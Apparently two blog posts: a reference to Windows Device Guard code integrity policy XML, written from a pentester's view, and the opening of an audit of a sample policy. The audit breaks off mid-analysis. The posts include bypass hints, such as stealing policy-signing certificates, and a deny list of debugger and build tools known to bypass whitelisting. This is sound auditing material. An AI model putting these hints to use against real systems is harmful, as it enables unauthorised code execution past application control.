
Windows Device Guard Code Integrity Policy Reference

One of the more obvious ways to circumvent Device Guard deployments is by exploiting code integrity policy misconfigurations. Effectively auditing deployed policies requires a thorough comprehension of the XML schema used by Device Guard. This post is intended to serve as documentation of the XML elements of a Device Guard code integrity policy, with a focus on auditing from the perspective of a pentester. Note that the schema used by Microsoft is not publicly documented and is subject to change in future versions. If things change, expect an update from me.
As a reminder, deployed code integrity policies are stored in %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b in binary form. If you're lucky enough to track down the original XML code integrity policy, you can validate that it matches the deployed SIPolicy.p7b by converting it to binary form with ConvertFrom-CIPolicy and then comparing the hashes with Get-FileHash. If you are unable to locate the original XML policy, you can recover an XML policy with the ConvertTo-CIPolicy function I wrote. Note, however, that ConvertTo-CIPolicy cannot recover all element ID and FriendlyName attributes because conversion to binary form is, unfortunately, lossy.
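A minimal sketch of that validation workflow (the file names here are illustrative):

# Convert the original XML policy to binary form
ConvertFrom-CIPolicy -XmlFilePath .\FinalPolicy.xml -BinaryFilePath .\FinalPolicy.bin

# Compare the hash of the converted policy against the deployed policy
$Deployed = Get-FileHash -Path "$Env:SystemRoot\System32\CodeIntegrity\SIPolicy.p7b"
$Converted = Get-FileHash -Path .\FinalPolicy.bin

if ($Deployed.Hash -eq $Converted.Hash) { 'Deployed policy matches the XML policy.' }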
For reference, here are some code integrity policies that I personally use. Obviously, yours will be different in your environment.
Policies are generated initially using the New-CiPolicy cmdlet.
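For example, an initial policy might be generated from a scan of a golden system with something like the following (the rule level and scan path are illustrative):

# Whitelist by issuing PCA certificate, falling back to hash rules for
# unsigned files. -UserPEs includes user-mode binaries in the scan.
New-CIPolicy -FilePath .\InitialPolicy.xml -Level PcaCertificate -Fallback Hash -ScanPath C:\ -UserPEs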
The current (but subject to change) code integrity schema can be found here. This was pulled out from an embedded resource in the ConfigCI cmdlets - Microsoft.ConfigCI.Commands.dll.
What will follow is a detailed breakdown of most code integrity policy XML elements that you may encounter while auditing Device Guard deployments. Hopefully, at some point in the future, Microsoft will provide such documentation. In the meantime, I hope this is helpful! In a future post, I will conduct an actual code integrity policy audit and identify potential vulnerabilities that would allow for unsigned code execution.

VersionEx
Default value: 10.0.0.0
Purpose: An admin can set this to perform versioning of updated CI policies. This is what I do in BypassDenyPolicy.xml. VersionEx can be set programmatically with Set-CIPolicyVersion.
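For example (the version string is illustrative):

# Bump the policy version prior to redeploying an updated policy
Set-CIPolicyVersion -FilePath .\FinalPolicy.xml -Version '10.0.0.1'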

PolicyTypeID

Default value: {A244370E-44C9-4C06-B551-F6016E563076}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

PlatformID
Default value: {2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

Rules

The Rules element consists of multiple child Rule elements. A Rule element refers to a specific policy rule option - i.e. a specific configuration of Device Guard. Some, but not all, of these options are documented. Policy rule options are configured with the Set-RuleOption cmdlet.
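Rule options are toggled by numeric index; a minimal sketch (index 0 corresponded to Enabled:UMCI at the time of this writing - run 'Set-RuleOption -Help' to confirm the mapping):

# List the available policy rule options and their indices
Set-RuleOption -Help

# Add a rule option to the target policy XML by index
Set-RuleOption -FilePath .\FinalPolicy.xml -Option 0

# Remove a rule option with -Delete
Set-RuleOption -FilePath .\FinalPolicy.xml -Option 0 -Delete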

Documented and/or publicly exposed policy rules

1) Enabled:UMCI
Description: Enforces user-mode code integrity for user mode binaries, PowerShell scripts, WSH scripts, and MSIs. The absence of this policy rule implies that whitelist/blacklist rules will only apply to drivers.
Operational impact: User mode binaries and MSIs not explicitly whitelisted will not execute. PowerShell will be placed into ConstrainedLanguage mode. Whitelisted, signed scripts have no restrictions and run in FullLanguage mode. WSH scripts (VBScript and JScript) not whitelisted per policy are unable to instantiate COM/ActiveX objects. Signed scripts whitelisted by policy have no such restrictions.
2) Required:WHQL
Description: Drivers must be Windows Hardware Quality Labs (WHQL) signed. Drivers signed with a WHQL certificate are indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.
Operational impact: This will raise the bar on the quality (and arguably the trustworthiness) of the drivers that will be allowed to execute.
3) Disabled:Flight Signing
Description: Disable loading of flight signed code. These are used most commonly with Insider Preview builds of Windows. A flight signed binary/script is one that is signed by a Microsoft certificate and has the "Preview Build Signing" EKU (1.3.6.1.4.1.311.10.3.27) applied. Thanks to Alex Ionescu for confirming this.
Operational Impact: Preview build binaries/scripts will not be allowed to load. In other words, if you're on a WIP build, don't expect your OS to function properly.
4) Enabled:Unsigned System Integrity Policy
Description: If present, the code integrity policy does not have to be signed with a code signing certificate. The absence of this rule option indicates that the code integrity policy must be signed by a whitelisted signer as indicated in the UpdatePolicySigners section below.
Operational Impact: Once signed, deployed code integrity options can only be updated by signing a new policy with a whitelisted certificate. Even an admin cannot remove deployed, signed code integrity policies. If modifying and redeploying a signed code integrity policy is your goal, you will need to steal one of the whitelisted UpdatePolicySigners code signing certificates.
5) Required:EV Signers
Description: All drivers must be EV (extended validation) signed.
Operational Impact: This will likely not be present as most 3rd party and OEM drivers are not EV signed. Supposedly, Microsoft is mandating that all drivers be EV signed starting with Windows 10 Anniversary Update. From my observation, this does not appear to be the case.
6) Enabled:Advanced Boot Options Menu
Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled.
Operational Impact: With this option present, the menu is available to someone with physical access. There are additional concerns associated with physical access to a Device Guard enabled system. Such concerns may be covered in a future blog post.
7) Enabled:Boot Audit On Failure
Description: If a driver fails to load during the boot process due to an overly restrictive code integrity policy, the system will be placed into audit mode for that session.
Operational Impact: If you could somehow get a driver to fail to load during the boot process, Device Guard would cease to be enforced.
8) Disabled:Script Enforcement
Description: This is not actually documented but listed with 'Set-RuleOption -Help'. You would think that this actually does what it says but in practice it doesn't. Even with this set, PowerShell and WSH remain locked down.
Operational Impact: None. It is unlikely that you would see this in production anyway.

Undocumented and/or not publicly exposed policy rules

The following policy rule options are undocumented and it is unclear if they are supported or not. As of this writing, you will likely never see these options in a deployed policy.
  • Enabled:Boot Menu Protection
  • Enabled:Inherit Default Policy
  • Allowed:Prerelease Signers
  • Allowed:Kits Signers
  • Allowed:Debug Policy Augmented
  • Allowed:UMCI Debug Options
  • Enabled:UMCI Cache Data Volumes
  • Allowed:SeQuerySigningPolicy Extension
  • Enabled:Filter Edited Boot Options
  • Disabled:UMCI USN 0 Protection
  • Disabled:Winload Debugging Mode Menu
  • Enabled:Strong Crypto For Code Integrity
  • Allowed:Non-Microsoft UEFI Applications For BitLocker
  • Enabled:Always Use Policy
  • Enabled:UMCI Trust USN 0
  • Disabled:UMCI Debug Options TCB Lowering
  • Enabled:Secure Setting Policy


EKUs
This can consist of a list of Extended/Enhanced Key Usages that can be applied to signers. When applied to a signer rule, the listed EKU must be present in the certificate used to sign the binary/script.
EKU instances have a "Value" attribute consisting of an encoded OID. For example, if you want to enforce WHQL signing, the "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) would need to be applied to those drivers. When encoded, the "Value" attribute would be "010A2B0601040182370A0305" (where the first byte, which would normally be 0x06 (absolute OID), is replaced with 0x01). The OID encoding process is described here. ConvertTo-CIPolicy decodes and resolves the original FriendlyName attribute for encoded OID values.
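The encoding can be reproduced with a short sketch like the following (the function name is mine, not part of the ConfigCI module; single-byte DER lengths are assumed):

function ConvertTo-CIEkuValue {
    param([Parameter(Mandatory)][string] $Oid)

    $Arcs = $Oid.Split('.') | ForEach-Object { [Int64] $_ }

    # The first content byte packs the first two arcs: 40 * arc1 + arc2
    [byte[]] $Content = @([byte] (40 * $Arcs[0] + $Arcs[1]))

    # Remaining arcs are base-128 encoded, high bit set on all but the last byte
    foreach ($Arc in ($Arcs | Select-Object -Skip 2)) {
        $Bytes = @(do { [byte] ($Arc -band 0x7F); $Arc = $Arc -shr 7 } while ($Arc))
        [array]::Reverse($Bytes)
        for ($i = 0; $i -lt $Bytes.Count - 1; $i++) { $Bytes[$i] = $Bytes[$i] -bor 0x80 }
        $Content += $Bytes
    }

    # 0x01 takes the place of the normal 0x06 OID tag, followed by a single
    # length byte (assumes the encoded content is shorter than 128 bytes)
    $Encoded = @([byte] 1, [byte] $Content.Count) + $Content
    ($Encoded | ForEach-Object { $_.ToString('X2') }) -join ''
}

# "Windows Hardware Driver Verification" (WHQL) - yields 010A2B0601040182370A0305
ConvertTo-CIEkuValue -Oid '1.3.6.1.4.1.311.10.3.5'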

FileRules
These are rules specific to individual files, based either on file hash or on filename and file version (both taken from the embedded PE version resource rather than the on-disk name). FileRules can consist of the following types: FileAttrib, Allow, Deny. File rules can apply to specific signers or signing scenarios.
FileAttrib
These are used to reflect a user or kernel PE filename and minimum file version number. These can be used to either explicitly allow or block binaries based on filename and version.
Allow
These typically consist of just a file hash and are used to override an explicit deny rule. In practice, it is unlikely that you will see an Allow file rule.
Deny
These typically consist of just a file hash and are used to override whitelist rules when you want to block trusted code by hash.

Signers
This section consists of all of the signing certificates that will be applied to rules in the signing scenario section. Each signer entry is required to have a CertRoot property where the Value attribute refers to the hash of the cbData blob of the certificate. The hashing algorithm used is dependent upon the hashing algorithm specified in the certificate. This hash serves as the unique identifier for the certificate. The CertRoot "Type" attribute will almost always be "TBS" (to be signed). The "WellKnown" type is also possible but will not be common.
The signer element can have any of the following optional child elements:
CertEKU
One or more EKUs from the EKU element described above can be applied here. Ultimately, this would constrain a whitelist rule to code signed with certificates with specific EKUs, "Windows Hardware Driver Verification" (WHQL) probably being the most common.
CertIssuer
I have personally not seen this in practice but this will likely contain the common name (CN) of the issuing certificate.
CertPublisher
This refers to the common name (CN) of the certificate. This element is associated with the "Publisher" file rule level.
CertOemID
This is often associated with driver signers. This will often have a third party vendor name associated with a driver signed with a "Microsoft Windows Third Party Component CA" certificate. If CertOemIDs were not specified for the "Microsoft Windows Third Party Component CA" signer, then you would implicitly be whitelisting all 3rd party drivers signed by Microsoft.
FileAttribRef
There may be one or more references to FileAttrib rules where the signer rules apply only to the files referenced.

SigningScenarios
When auditing Code Integrity policies, this is where you will want to start your audit and then work backwards. It contains all the enforcement rules for drivers and user mode code. Signing scenarios consist of a combination of the individual elements discussed previously. There will almost always be two Signing scenario elements present:
  1. <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1"> - This scenario will consist of zero or more rules related to driver loading.
  2. <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS"> - This scenario will consist of zero or more rules related to user mode binaries, scripts, and MSIs.

Each signing scenario can have up to three subelements:
  1. ProductSigners - This will comprise all of the code integrity rules for drivers or user mode code depending upon the signing scenario.
  2. TestSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.
  3. TestSigningSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.

Each signers group (ProductSigners, TestSigners, or TestSigningSigners) may consist of any of the following subelements:
Allowed signers
These are the whitelisted signer rules. These will consist of one or more signer rules and optionally, one or more ExceptDenyRules which link to specific file rules making the signer rule conditional. In practice, ExceptDenyRules will likely not be present.
Denied signers
These are the blacklisted signer rules. These rules will always take priority over allow rules. These will consist of one or more signer rules and optionally, one or more ExceptAllowRules which link to specific file rules making the signer rule conditional. In practice, ExceptAllowRules will likely not be present.
FileRulesRef
These will consist of individual file allow or deny rules. For example, if there are individual files to be blocked by hash, such rules will be included here.

UpdatePolicySigners
If policy signing is required as indicated by the absence of the "Enabled:Unsigned System Integrity Policy" policy rule option, a deployed policy must be signed by the signers indicated here. The only way to modify a deployed policy in this case would be to resign the policy with one of these certificates. UpdatePolicySigners is updated using the Add-SignerRule cmdlet.
If a binary policy (SIPolicy.p7b) is signed, you can validate signature with Get-CIBinaryPolicyCertificate.
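For reference, UpdatePolicySigners entries are added with the Add-SignerRule cmdlet; a minimal sketch (the certificate path is illustrative):

# Authorize the certificate in CodeSigningCert.cer to sign policy updates
Add-SignerRule -FilePath .\FinalPolicy.xml -CertificatePath .\CodeSigningCert.cer -Update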

CISigners
These will consist of mirrored signing rules from the ID_SIGNINGSCENARIO_WINDOWS signing scenario. These are related to the trusting of signers and signing levels by the kernel. These are auto-generated and not configurable via the ConfigCI PowerShell module. These entries should not be modified.

HvciOptions
This specifies the configured hypervisor code integrity (HVCI) option. HVCI implements several kernel exploitation mitigations, including W^X kernel memory, and restricts the ability to allocate executable memory for code that isn't explicitly whitelisted. Basically, HVCI allows the system to continue to enforce code integrity even if the kernel is compromised. HVCI settings are configured using the Set-HVCIOptions cmdlet.
Any combination of the following values are accepted:
0 - Not configured
1 - Enabled
2 - Strict mode
4 - Debug mode
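HVCI options are toggled with switches on Set-HVCIOptions; for example:

# Enable HVCI in the policy XML (-Strict and -DebugMode are also available)
Set-HVCIOptions -Enabled -FilePath .\FinalPolicy.xml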
HVCI is not well documented as of this writing.
Outside of Microsoft, Alex Ionescu and Rafal Wojtczuk are experts on this subject.

Settings
Settings may consist of one or more provider/value pairs. These options are referred to internally as "Secure Settings". The range of possible values that can be set here is unclear. The only entry you might see would be a PolicyInfo provider setting where a user can specify an explicit Name and Id for the code integrity policy, which would be reflected in Microsoft-Windows-CodeIntegrity/Operational events. PolicyInfo settings can be set with the Set-CIPolicyIdInfo cmdlet.
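A minimal sketch (the name and ID values are illustrative):

# Set a friendly name and ID that will surface in CodeIntegrity event logs
Set-CIPolicyIdInfo -FilePath .\FinalPolicy.xml -PolicyName 'Workstation Policy' -PolicyId 'v10.0.0.1'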

Device Guard Code Integrity Policy Auditing Methodology

In my previous blog post, I provided a detailed reference of every component of a code integrity (CI) policy. In this post, I'd like to exercise that reference and perform an audit of a code integrity policy. We're going to analyze a policy that I had previously deployed to my Surface Pro 4 - final.xml.

<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Required:Enforce Store Applications</Option>
    </Rule>
    <Rule>
      <Option>Enabled:UMCI</Option>
    </Rule>
    <Rule>
      <Option>Disabled:Flight Signing</Option>
    </Rule>
    <Rule>
      <Option>Required:WHQL</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Advanced Boot Options Menu</Option>
    </Rule>
  </Rules>
  <!--EKUS-->
  <EKUs/>
  <!--File Rules-->
  <FileRules>
    <FileAttrib ID="ID_FILEATTRIB_F_1_0_0_1_0_0" FriendlyName="cdb.exe" FileName="CDB.Exe" MinimumFileVersion="99.0.0.0"/>
    <FileAttrib ID="ID_FILEATTRIB_F_2_0_0_1_0_0" FriendlyName="kd.exe" FileName="kd.exe" MinimumFileVersion="99.0.0.0"/>
    <FileAttrib ID="ID_FILEATTRIB_F_3_0_0_1_0_0" FriendlyName="windbg.exe" FileName="windbg.exe" MinimumFileVersion="99.0.0.0"/>
    <FileAttrib ID="ID_FILEATTRIB_F_4_0_0_1_0_0" FriendlyName="MSBuild.exe" FileName="MSBuild.exe" MinimumFileVersion="99.0.0.0"/>
    <FileAttrib ID="ID_FILEATTRIB_F_5_0_0_1_0_0" FriendlyName="csi.exe" FileName="csi.exe" MinimumFileVersion="99.0.0.0"/>
  </FileRules>
  <!--Signers-->
  <Signers>
    <Signer ID="ID_SIGNER_S_1_0_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_AE_0_0_0_0_0_0_0" Name="Intel External Basic Policy CA">
      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_AF_0_0_0_0_0_0_0" Name="Microsoft Windows Third Party Component CA 2012">
      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_17C_0_0_0_0_0_0_0" Name="COMODO RSA Certification Authority">
      <CertRoot Type="TBS" Value="7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_18D_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">
      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_2E0_0_0_0_0_0_0_0" Name="VeriSign Class 3 Code Signing 2010 CA">
      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_34C_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_34F_0_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">
      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_37B_0_0_0_0_0_0_0" Name="Microsoft Root Certificate Authority">
      <CertRoot Type="TBS" Value="391BE92883D52509155BFEAE27B9BD340170B76B"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_485_0_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">
      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_1_1_0_0_0_0_0_0" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_35C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_35F_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2011">
      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA 2010">
      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_2316_1_0_0_0_0_0_0" Name="Microsoft Windows Verification PCA">
      <CertRoot Type="TBS" Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="7251ADC0F732CF409EE462E335BB99544F2DD40F"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_4_1_0_0_0" Name="Matthew Graeber">
      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_1_1_0" Name="Intel External Basic Policy CA">
      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73"/>
      <CertPublisher Value="Intel(R) Intel_ICG"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_2_1_0" Name="Microsoft Windows Third Party Component CA 2012">
      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_19_1_0" Name="Intel External Basic Policy CA">
      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73"/>
      <CertPublisher Value="Intel(R) pGFX"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_20_1_0" Name="iKGF_AZSKGFDCS">
      <CertRoot Type="TBS" Value="32656594870EFFE75251652A99B906EDB92D6BB0"/>
      <CertPublisher Value="IntelVPGSigning2016"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_4E_1_0" Name="Microsoft Windows Third Party Component CA 2012">
      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_65_1_0" Name="VeriSign Class 3 Code Signing 2010 CA">
      <CertRoot Type="TBS" Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D"/>
      <CertPublisher Value="Logitech"/>
    </Signer>
    <Signer ID="ID_SIGNER_S_5_1_0_0_0" Name="Matthew Graeber">
      <CertRoot Type="TBS" Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A"/>
    </Signer>
    <Signer ID="ID_SIGNER_F_1_0_0_1_0_0" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
      <CertPublisher Value="Microsoft Corporation"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
    </Signer>
    <Signer ID="ID_SIGNER_F_2_0_0_1_0_0" Name="Microsoft Code Signing PCA 2010">
      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
      <CertPublisher Value="Microsoft Corporation"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_2_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_3_0_0_1_0_0"/>
    </Signer>
    <Signer ID="ID_SIGNER_F_3_0_0_1_0_0" Name="Microsoft Code Signing PCA 2011">
      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
      <CertPublisher Value="Microsoft Corporation"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_5_0_0_1_0_0"/>
    </Signer>
    <Signer ID="ID_SIGNER_F_4_0_0_1_0_0" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
      <CertPublisher Value="Microsoft Windows"/>
      <FileAttribRef RuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
    </Signer>
  </Signers>
  <!--Driver Signing Scenarios-->
  <SigningScenarios>
    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_1_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_AE_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_AF_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_17C_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_18D_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_2E0_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_34C_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_34F_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_37B_0_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_485_0_0_0_0_0_0_0"/>
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_1_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_2_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_4_1_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_19_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_20_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_4E_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_65_1_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0"/>
          <AllowedSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0"/>
        </AllowedSigners>
        <DeniedSigners>
          <DeniedSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0"/>
          <DeniedSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0"/>
          <DeniedSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0"/>
          <DeniedSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0"/>
        </DeniedSigners>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
  <UpdatePolicySigners>
    <UpdatePolicySigner SignerId="ID_SIGNER_S_5_1_0_0_0"/>
  </UpdatePolicySigners>
  <CiSigners>
    <CiSigner SignerId="ID_SIGNER_F_1_0_0_1_0_0"/>
    <CiSigner SignerId="ID_SIGNER_F_2_0_0_1_0_0"/>
    <CiSigner SignerId="ID_SIGNER_F_3_0_0_1_0_0"/>
    <CiSigner SignerId="ID_SIGNER_F_4_0_0_1_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_1_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_2_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_4_1_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_19_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_20_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_4E_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_65_1_0"/>
    <CiSigner SignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0"/>
    <CiSigner SignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0"/>
  </CiSigners>
  <HvciOptions>1</HvciOptions>
</SiPolicy>

A code integrity policy is only as good as the way in which it was configured. The only way to verify its effectiveness is with a thorough understanding of the policy schema and the intended deployment scenario of the policy, all through the lens of an attacker. The analysis that I present, while subjective, will be thorough and well thought out based on the information I've learned about code integrity policy enforcement. The extent of my knowledge is driven by my experience with Device Guard thus far, Microsoft's public documentation, the talks I've had with the Device Guard team, and what I've reverse engineered.

Hopefully, you'll have the luxury of being able to analyze an original CI policy containing all comments and attributes. In some situations, you may not be so lucky and may be forced to obtain an XML policy from a deployed binary policy - SIPolicy.p7b. Comments and some attributes are stripped from binary policies. CI policy XML can be recovered with ConvertTo-CiPolicy.

Alright. Let's dive into the analysis now. When I audit a code integrity policy, I will start in the following order:
  1. Policy rule analysis
  2. SigningScenario analysis. Signing scenario rules are ultimately generated based on a combination of one or more file rule levels.
  3. UpdatePolicySigner analysis
  4. HvciOptions analysis

Policy Rule Analysis
Policy rules dictate the overall configuration of Device Guard. What will follow is a description of each rule and its implications.

1) Required:Enforce Store Applications

Description: The presence of this setting indicates that code integrity will also be applied to Windows Store/UWP apps.

Implications: It is unlikely that the absence of this rule would lead to a code integrity bypass scenario, but on the off chance an attacker attempted to deploy an unsigned UWP application, Device Guard would prevent it from loading. The actual implementation of this rule is unclear to me and warrants research. For example, if you launch modern calc (Calculator.exe), it is not actually signed. There’s obviously some other layer of enforcement occurring that I don’t currently comprehend.

Note: This rule option is not actually officially documented, but it is accessible via the Set-RuleOption cmdlet.

2) Enabled:UMCI

Description: The presence of this setting indicates that user mode code integrity is to be enforced. This means that all user-mode code (exe, dll, msi, js, vbs, PowerShell) is subject to enforcement. Compiled binaries (e.g. exe, dll, msi) not conformant to policy will outright fail to load. WSH scripts (JS and VBScript) not conformant to policy will be prevented from instantiating COM objects, and PowerShell scripts/modules not conformant to policy will be placed into Constrained Language mode. The absence of this rule implies that the code integrity policy will only apply to drivers.

